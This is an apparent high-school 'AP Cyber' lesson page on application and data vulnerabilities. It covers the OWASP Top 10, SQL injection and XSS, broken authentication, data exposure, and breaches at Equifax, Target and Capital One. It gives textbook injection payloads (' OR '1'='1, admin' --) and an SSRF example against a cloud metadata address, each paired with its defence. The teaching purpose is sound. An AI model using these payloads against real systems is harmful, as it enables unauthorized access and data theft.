5.1 Application & Data Vulnerabilities
Application & Data Vulnerabilities: The Attack Surface Applications Expose
Applications are where attackers meet your data. Master the OWASP Top 10 framework, trace how injection and broken authentication actually work, and connect every vulnerability to the real breaches that made headlines. This is the foundation for everything that comes next in Unit 5.
- 5.1.1 — Learning Objectives(3 min)
- 5.1.2 — Why Applications Are the #1 Attack Vector(7 min)
- 5.1.3 — Essential Vocabulary & Exam Tips(10 min)
- 5.1.4 — The OWASP Top 10 Framework(12 min)
- 5.1.5 — Injection Attacks: How SQLi & XSS Actually Work(12 min)
- 5.1.6 — Broken Authentication & Session Failures(8 min)
- 5.1.7 — Sensitive Data Exposure: Storage & Transit(6 min)
- 5.1.8 — Real Breach Case Studies(6 min)
- 5.1.9 — Worked Examples: Predict First(7 min)
- 5.1.10 — AP Exam Strategy(4 min)
- 5.1.11 — FAQ(5 min)
15.1.1 — Learning Objectives
By the end of this lesson you will be able to:
- Identify the three categories of application and data vulnerabilities: injection, authentication & access, and data exposure.
- Map any described attack to its OWASP Top 10 category.
- Trace how SQL injection, XSS, and broken authentication actually execute, step by step.
- Distinguish application vulnerabilities from data vulnerabilities and explain how they chain together in real breaches.
- Recommend the correct control for each category of vulnerability.
- Analyze real-world breach scenarios (Equifax, Target, Capital One) and identify which OWASP category was exploited.
25.1.2 — Why Applications Are the #1 Attack Vector
Units 1 through 4 of this course built a mental model: attackers target people (Unit 1), physical spaces (Unit 2), networks (Unit 3), and devices (Unit 4). Unit 5 goes to the final frontier — the applications and data those earlier controls protect.
Here is the uncomfortable reality that drives this entire unit: even if a company deploys every control from Units 1–4 perfectly — the best MFA, the best firewalls, the best hardened servers — a single vulnerable web application can hand an attacker everything. Applications are exposed to the Internet by design. They must accept untrusted input. They hold the data attackers actually want.
Why Applications Expose So Much Attack Surface
A web form cannot function without letting strangers type data into it. Every input field, URL parameter, and API endpoint is a potential doorway. Firewalls cannot block this traffic because it is the product.
Your bank's login page is the translator between "I am a customer" and "show me this account's balance." If the translator is tricked, the database hands over data that the database itself would have refused to give directly.
Security reviews slow releases. Developers copy code from Stack Overflow. Frameworks get patched but applications do not. This is not cynicism — it is the reason 94% of tested applications contain at least one broken access control issue (OWASP 2021 data).
A phished employee loses one account. A vulnerable application leaks every record in the database. Scale makes application vulnerabilities the highest-payoff target.
The Three Categories You Must Know Cold
Every application and data vulnerability on the AP Cyber exam falls into one of three buckets. Memorize these three — they are the lens through which you will classify every scenario in the unit.
| Category | What It Means | Classic Example | Defender Says |
|---|---|---|---|
| Injection | Untrusted input reaches an interpreter (SQL, HTML, shell) as code. | SQL injection, XSS, command injection | "Never trust user input. Parameterize everything." |
| Broken Auth & Access Control | Identity verification or authorization fails; attackers impersonate or escalate. | Session hijacking, weak passwords, missing authz checks | "Verify who you are. Check what you can do. Every request." |
| Sensitive Data Exposure | Confidential data is stored, transmitted, or logged without adequate protection. | Plaintext passwords, unencrypted backups, HTTP instead of HTTPS | "Encrypt at rest. Encrypt in transit. Log nothing sensitive." |
35.1.3 — Essential Vocabulary & Exam Tips
The exam rewards students who can translate a plain-English attack description into the exact technical term. Learn these definitions as matched pairs — what the term means and what the exam calls it.
/user/123 to /user/124 and seeing another person's data.45.1.4 — The OWASP Top 10 Framework
The Open Web Application Security Project maintains the industry's canonical list of the most critical web application security risks. The AP Cyber exam uses this framework implicitly — every Unit 5 application-security question maps to an OWASP category.
You do not need to memorize OWASP numbering (A01, A02, etc.) for the AP exam. You do need to recognize each category by its description and map real scenarios to the right one.
The OWASP Top 10 (2021 edition) — AP Cyber Exam Priority
| OWASP Category | What Goes Wrong | Example | Primary Control |
|---|---|---|---|
| Broken Access Control | Users can perform actions outside their intended permissions. | User changes URL from /orders/42 to /orders/43 and sees another customer's order. |
Enforce authorization on every request. Deny by default. |
| Cryptographic Failures (a.k.a. Sensitive Data Exposure) | Data is stored or transmitted without adequate protection. | Passwords stored in plaintext. HTTP login page. Old MD5 hashes. | Encrypt in transit (TLS). Hash passwords (bcrypt/Argon2). Encrypt at rest. |
| Injection | Untrusted input is interpreted as code. | SQL injection, XSS, command injection. | Parameterized queries. Output encoding. Input validation. |
| Insecure Design | Security was not considered during application design. | Password reset flow has no rate limit, allowing enumeration. | Threat modeling during design. Secure design patterns. |
| Security Misconfiguration | Default credentials, unnecessary features enabled, verbose errors. | Admin panel accessible on public IP with password admin/admin. |
Hardening baselines. Disable defaults. Minimal attack surface. |
| Vulnerable & Outdated Components | Using libraries or frameworks with known unpatched flaws. | Apache Struts with known CVE still running in production. | Patch management. Dependency scanning. SBOM. |
| Identification & Authentication Failures (a.k.a. Broken Authentication) | Identity verification fails. | Weak password policies. Credential stuffing works. No MFA. | MFA. Rate limiting. Strong session management. |
| Software & Data Integrity Failures | Code or data is accepted from untrusted sources without verification. | Auto-update mechanism does not verify signatures. | Code signing. Integrity checks. Trusted supply chain. |
| Security Logging & Monitoring Failures | Attacks are not logged or alerts are not generated. | Breach went undetected for 9 months because no logs existed. | Centralized logging. Alerting thresholds. SIEM review. |
| Server-Side Request Forgery (SSRF) | Application fetches a URL from user input, enabling internal network access. | User supplies http://169.254.169.254/ and app leaks AWS metadata. |
Validate URL targets. Block private IP ranges from app requests. |
Rows in purple are the four categories that appear most often on AP Cyber exam questions. If you are tight on study time, prioritize these.
55.1.5 — Injection Attacks: How SQLi & XSS Actually Work
Injection is the single most tested application vulnerability on AP Cyber. The exam does not expect you to write injection payloads, but it absolutely expects you to trace why a given payload works.
The Universal Pattern of Injection
Every injection attack in history follows the same three-step pattern:
- The application receives untrusted input (form field, URL parameter, header, uploaded file).
- The application combines that input with code meant to be interpreted later (SQL query, HTML page, shell command).
- The interpreter cannot tell the difference between the developer's code and the attacker's input. The interpreter runs everything as instructions.
If you can recite this three-step pattern on the exam, you can solve any injection question.
SQL Injection: A Real Login Form
Suppose a developer writes this login code (conceptual Python):
query = "SELECT * FROM users WHERE username = '" + input_user + "' AND password = '" + input_pass + "'"
database.execute(query)
When the user types alice and hunter2, the query becomes:
SELECT * FROM users WHERE username = 'alice' AND password = 'hunter2'
Exactly what the developer intended. Now watch what happens when an attacker types ' OR '1'='1 in the password field:
SELECT * FROM users WHERE username = 'alice' AND password = '' OR '1'='1'
The query now says: return rows where the password is empty OR where 1 equals 1. Since 1 always equals 1, the query returns every row. The attacker is logged in as the first user in the database — often the admin.
The Fix: Parameterized Queries
The defense is not to filter special characters — that is a losing game. The defense is to structurally separate code from data. A parameterized query looks like this:
query = "SELECT * FROM users WHERE username = ? AND password = ?"
database.execute(query, [input_user, input_pass])
The ? placeholders tell the database driver: these are data, not code. No matter what is in them, do not interpret them as SQL. An attacker typing ' OR '1'='1 now just searches for a literal password that contains those characters, finds nothing, and is rejected.
Cross-Site Scripting (XSS): Injection into HTML
XSS is the same three-step pattern, but the interpreter is the browser and the injected code is JavaScript.
Suppose a comment section displays user comments like this:
[user comment here]
If the application does not encode output, an attacker can submit this "comment":
Every future visitor who views that comment has their session cookie sent to the attacker. The attacker now impersonates those users without knowing their passwords.
Injection Variants You Should Recognize
| Variant | Interpreter | Typical Target |
|---|---|---|
| SQL Injection | Database engine | Bypass login, dump tables, modify data |
| XSS (Cross-Site Scripting) | Victim's browser | Steal sessions, deface, keylog |
| Command Injection | Server OS shell | Execute commands on server |
| LDAP Injection | Directory service | Bypass directory authentication |
| XML/XXE Injection | XML parser | Read local files, SSRF |
65.1.6 — Broken Authentication & Session Failures
Authentication is the system that answers the question: are you actually who you say you are? Broken authentication is any failure of that system. On the AP exam, broken authentication usually shows up as one of four patterns.
Pattern 1: Weak Password Policies
The application allows short passwords, common passwords, or reused breached passwords. Attackers use credential stuffing (trying leaked username/password pairs from other breaches) or dictionary attacks (trying common passwords).
The defense isn't "require special characters." Modern guidance (NIST SP 800-63B) says password length is what matters, combined with checking against known-breached passwords. Special character requirements actually push users toward predictable patterns like Password1!.
Pattern 2: Session Token Problems
When you log in, the server gives your browser a session token (a random string stored as a cookie). Every subsequent request sends that token as proof of identity. If the token is stolen, guessed, or reused, an attacker is logged in as you — no password needed.
Old systems generated session IDs sequentially (session 1001, 1002, 1003...). Attackers guessed valid IDs. Modern systems use cryptographically random tokens.
If a session token is passed in the URL (?sessionid=abc123), it ends up in browser history, server logs, and referrer headers sent to other sites. Tokens belong in cookies, never URLs.
A session valid for a year means a stolen token is valid for a year. Good systems expire tokens after inactivity and require periodic re-authentication for sensitive actions.
If a token remains valid when used from a different IP, device, or browser, a stolen token is infinitely reusable. Binding tokens to device fingerprints limits damage.
Pattern 3: Missing or Weak MFA
Multi-factor authentication (MFA) requires something the user knows (password) plus something they have (phone, token, security key) or something they are (fingerprint). Skipping MFA on the grounds that "it is inconvenient" is the single most common broken-authentication failure in breach post-mortems.
Not all MFA is equal. SMS codes can be intercepted by SIM-swap attacks. Authenticator apps (TOTP) are better. Hardware security keys (FIDO2) are strongest.
Pattern 4: Credential Recovery Flows
Password reset flows are frequently weaker than the login flow itself. If "forgot password" sends a link valid for 7 days, stored in an unencrypted email, and allows the attacker to set any new password without confirming identity, the password itself never mattered.
75.1.7 — Sensitive Data Exposure: Storage & Transit
Sensitive data exposure (OWASP now calls it "Cryptographic Failures") covers every way that confidential data can be revealed because it was not protected adequately. Two contexts matter: data at rest (storage) and data in transit (network).
Data At Rest: What Went Wrong
| Failure | Why It Fails | Control |
|---|---|---|
| Plaintext passwords in database | A single database breach exposes every credential immediately. Attackers try those credentials on every other site (credential stuffing). | Hash passwords with a slow adaptive function (bcrypt, Argon2). Never encrypt passwords — hash them. |
| Weak or deprecated hash algorithms | MD5 and SHA-1 are broken. Attackers precompute rainbow tables or use GPU clusters to crack billions of hashes per second. | Use bcrypt, scrypt, or Argon2 with per-user salt. (Covered deeply in 5.3.) |
| Unencrypted backups | Backups often leave the production security perimeter. An unencrypted backup tape lost in shipping is a data breach. | Encrypt backups before they leave disk. Manage backup keys separately from production keys. |
| Sensitive data in application logs | Debug logs capturing full request bodies routinely contain passwords, credit cards, and session tokens. Logs get shared, shipped to third parties, and kept forever. | Scrub sensitive fields from logs at the logging library level. Never log password, CVV, or token fields. |
| Data retained past its useful life | Data you do not have cannot be stolen. Storing 10 years of customer records because "we might need it" enlarges every breach. | Data retention policy with automatic deletion. Minimize collection. |
Data In Transit: What Went Wrong
Data moving between client and server is exposed to every network between them. If the data is not encrypted in transit, anyone on those networks can read and modify it.
- HTTP instead of HTTPS. Anyone on public Wi-Fi, in an ISP, or on the corporate network can read unencrypted HTTP traffic. There is no modern justification for HTTP on an authenticated application.
- Outdated TLS versions. TLS 1.0 and 1.1 have known vulnerabilities. Current baseline is TLS 1.2; TLS 1.3 is preferred. Deprecated protocols must be disabled on the server.
- Weak cipher suites. Even with TLS enabled, servers can be configured to accept weak ciphers (RC4, DES). Attackers can force a downgrade negotiation.
- Missing certificate validation. If the client does not verify the server's certificate, a man-in-the-middle can present their own certificate and decrypt traffic.
85.1.8 — Real Breach Case Studies
Every category you just studied shows up in real breaches that made headlines. Walking through each of these helps lock in which OWASP category the AP exam is testing when similar scenarios appear.
Case 1: Equifax (2017) — 147 Million Records
What happened: Attackers exploited a known vulnerability in Apache Struts, a web application framework used on Equifax's consumer dispute portal. A patch had been available for two months but had not been applied.
OWASP category: Vulnerable and Outdated Components (with Injection as the underlying flaw in Struts itself).
What was exposed: Names, Social Security numbers, birth dates, addresses, driver's license numbers for roughly half the U.S. adult population.
Lesson: Patch management is a security control. An unpatched library in production is a vulnerability regardless of how secure the rest of the application is.
Case 2: Heartland Payment Systems (2008) — 134 Million Card Numbers
What happened: SQL injection on a corporate website gave attackers initial access. They pivoted to the payment processing network and installed sniffers that captured unencrypted card data as it moved between systems.
OWASP categories: Injection (initial access) + Cryptographic Failures (unencrypted internal traffic).
What was exposed: Credit and debit card numbers from every transaction for months.
Lesson: Internal networks are not "trusted." Data should be encrypted in transit even inside a company's own network (defense in depth).
Case 3: Target (2013) — 40 Million Card Numbers
What happened: Attackers phished an HVAC contractor that had remote access to Target's network. Once inside, they installed memory-scraping malware on point-of-sale systems that captured card data from RAM as customers swiped.
OWASP categories: Broken Access Control (HVAC vendor had access to payment systems with no segmentation) + Sensitive Data Exposure (card data was readable in memory).
What was exposed: Card data for 40 million customers, personal data for another 70 million.
Lesson: The weakest third-party access point becomes your weakest point. Network segmentation and least-privilege access for vendors are non-negotiable.
Case 4: Capital One (2019) — 100 Million Records
What happened: A former AWS employee exploited a misconfigured web application firewall to trick Capital One's servers into making requests to AWS metadata services (SSRF). The metadata contained credentials that gave access to S3 buckets full of customer data.
OWASP categories: Security Misconfiguration + Server-Side Request Forgery.
What was exposed: Names, addresses, credit scores, Social Security numbers, and bank account numbers of 100 million people.
Lesson: Cloud misconfigurations are the modern equivalent of leaving the front door unlocked. Cloud metadata services and WAF rules require specific hardening.
Case 5: Yahoo (2013–2014, disclosed 2016) — 3 Billion Accounts
What happened: Multiple intrusions over two years. Attackers obtained Yahoo's user database, which stored passwords hashed with MD5 — a deprecated algorithm — with minimal salting. Attackers cracked most passwords offline at GPU speed.
OWASP category: Cryptographic Failures (deprecated hash function).
What was exposed: Email addresses, security questions, hashed passwords for every Yahoo account at the time.
Lesson: Choosing the right password hashing algorithm is not an implementation detail. Yahoo's choice of MD5 effectively made their password storage transparent once breached.
95.1.9 — Worked Examples: Predict First, Then Classify
The exam rewards students who classify before they read options. For each of these worked examples, cover the answer, commit to your category, then compare.
/records/5821. A security researcher notices that changing the number in the URL to /records/5822 returns a different patient's complete history. Authentication is required, but any logged-in user can access any record.Classify Before Looking at Options
The user is authenticated — they logged in successfully. The failure is that the system does not check whether this logged-in user is allowed to see this particular record. Classification: Broken Access Control.
Eliminate Trap Answers
Broken authentication would mean they got in without valid credentials — not the case here. Injection would require malformed input to the application — the attacker just incremented a number. Sensitive data exposure describes the consequence, but the root cause is missing authorization checks.
Identify the Fix
The application must verify on every request: does this authenticated user have permission to view record 5822? In code: check that record.patient_id == authenticated_user.patient_id (or their delegated viewers) before returning the record.
admin' -- in the username field of a login form and leaves the password field blank. They are immediately logged in as the administrator. The application uses a MySQL database.Trace the Attack
The single quote after "admin" closes the string in the SQL query. The -- is a SQL comment marker — everything after it is ignored. The query becomes: SELECT * FROM users WHERE username = 'admin' --' AND password = ''. The password check is commented out. The database returns the admin row, and the attacker is authenticated.
Classify
Untrusted input (username field) was interpreted as code (SQL). Classification: Injection (specifically SQL injection).
Identify the Control
Parameterized queries. The username field should be bound as a data parameter, not concatenated into the query string. No amount of input filtering is as reliable as structural separation.
What Category?
No one was hacked. No login was bypassed. The failure is that sensitive data is being written to a place where it should not exist and is accessible to people who should not see it. Classification: Sensitive Data Exposure (Cryptographic Failures).
Why Is This Serious Even Without an Active Attack?
Every log entry is a potential breach. Third-party employees with access, backups of the logging service, a future misconfiguration of the log retention policy, or a breach of the logging vendor all expose the data. Sensitive data exposure failures are breach accelerants — they make future attacks more damaging.
The Fix
Scrub password, CVV, and token fields from logs at the logging library level, before the log line is ever written. Also review what data is being collected in the first place (data minimization).
105.1.10 — AP Exam Strategy: Application & Data Security Questions
Unit 5 questions on the AP Cyber exam tend to follow predictable patterns. If you recognize the pattern, you can solve the question before reading all four options — which is exactly the "predict first" method that separates 5-scorers from 3-scorers.
The Three-Question Triage
For any application-security scenario on the exam, run through these three questions in order:
- Was untrusted input interpreted as code? If yes → Injection.
- Did the attacker get in without valid credentials, or act as someone they are not? If they got in with no password → Broken Authentication. If they got in as themselves but did things they shouldn't → Broken Access Control.
- Was data revealed because of how it was stored, transmitted, or logged? If yes → Sensitive Data Exposure / Cryptographic Failures.
Pattern-Match Language the Exam Uses
| Exam Phrase | Probable Category |
|---|---|
| "submitted a specially crafted input," "included special characters" | Injection |
| "a form field," "a URL parameter," "JavaScript executed in the browser" | Injection (XSS if browser, SQLi if database) |
| "used a stolen session cookie," "hijacked the session" | Broken Authentication / Session Hijacking |
| "modified the URL to access another user's data" | Broken Access Control |
| "the database was leaked and passwords were recovered" | Sensitive Data Exposure (weak hashing) |
| "intercepted over the network," "captured on public Wi-Fi" | Sensitive Data Exposure (no TLS / weak TLS) |
| "a known vulnerability that had a patch available" | Vulnerable & Outdated Components |
Common Distractor Traps
If the attack did not require the password (session hijacking, SQLi login bypass), changing the password does nothing. Don't fall for "require users to reset passwords" when the root cause was elsewhere.
Firewalls are Unit 3 controls. Application-layer attacks pass through the firewall as legitimate HTTP/HTTPS traffic. A firewall cannot stop SQL injection or XSS.
Antivirus finds known malware on endpoints. It cannot stop attacks against your web application's login form. Wrong layer.
Trying to filter out dangerous characters is a losing game. Parameterized queries (for SQLi) and output encoding (for XSS) are structural, not filter-based. Pick the structural option when it appears.
?5.1.11 — Frequently Asked Questions
Q: What is the difference between an application vulnerability and a data vulnerability?
Application vulnerabilities live in the code or configuration of software (SQL injection, XSS, broken auth). Data vulnerabilities live in how data is handled (plaintext storage, unencrypted transit, over-collection). Most real breaches use an application vulnerability to reach a data vulnerability.
Q: Do I need to memorize the exact OWASP Top 10 numbering (A01, A02, etc.) for the exam?
No. The AP Cyber exam tests the concepts in the OWASP Top 10, not the numbering. You need to recognize each category by its description and match scenarios to the right one.
Q: Why is "broken authentication" different from "broken access control"?
Authentication answers "are you who you say you are?" Access control answers "are you allowed to do this specific thing?" A successful login is authentication. Refusing to let you view someone else's records is access control. On the exam, if the attacker logged in without valid credentials, classify it as broken authentication. If they logged in as themselves but saw data they shouldn't, classify it as broken access control.
Q: I keep seeing "sensitive data exposure" and "cryptographic failures" used interchangeably. Which is correct?
Both refer to the same OWASP category. The 2017 edition called it "Sensitive Data Exposure." The 2021 edition renamed it to "Cryptographic Failures" to emphasize that the root cause is usually a cryptographic choice (no encryption, weak encryption, weak hashing). Either name is acceptable on the AP exam.
Q: How is SQL injection still a thing in 2026? Isn't it solved?
Parameterized queries solve it completely. But legacy codebases are enormous, developers copy vulnerable code from tutorials, and new injection variants appear as new query languages emerge (NoSQL injection, GraphQL injection). Injection remains in the OWASP Top 10 because new applications keep making the same mistake.
Q: Why do we hash passwords instead of encrypting them?
Encryption is reversible by design — if someone holds the key, they can decrypt. Hashing is one-way. When a user logs in, the system hashes what they typed and compares it to the stored hash. It never needs to recover the original password. This means even a full database breach does not immediately expose passwords — attackers must crack each hash, which with bcrypt or Argon2 takes prohibitive time per password. Unit 5.3 covers this in depth.
Q: What is the single most useful thing to memorize for application security on the exam?
The three-category triage from section 5.1.10: (1) input as code = injection; (2) identity or permission failure = broken auth or access control; (3) data revealed by how it was handled = sensitive data exposure. Ninety percent of Unit 5 application security questions are solved by getting this classification right, then picking the control that structurally addresses that category.
+ Continue Learning
Get in Touch
Whether you're a student, parent, or teacher — I'd love to hear from you.
Just want free AP CS resources?
Enter your email below and check the subscribe box — no message needed. Students get daily practice questions and study tips. Teachers get curriculum resources and teaching strategies.
Message Sent!
Thanks for reaching out. I'll get back to you within 24 hours.
Prefer email? Reach me directly at [email protected]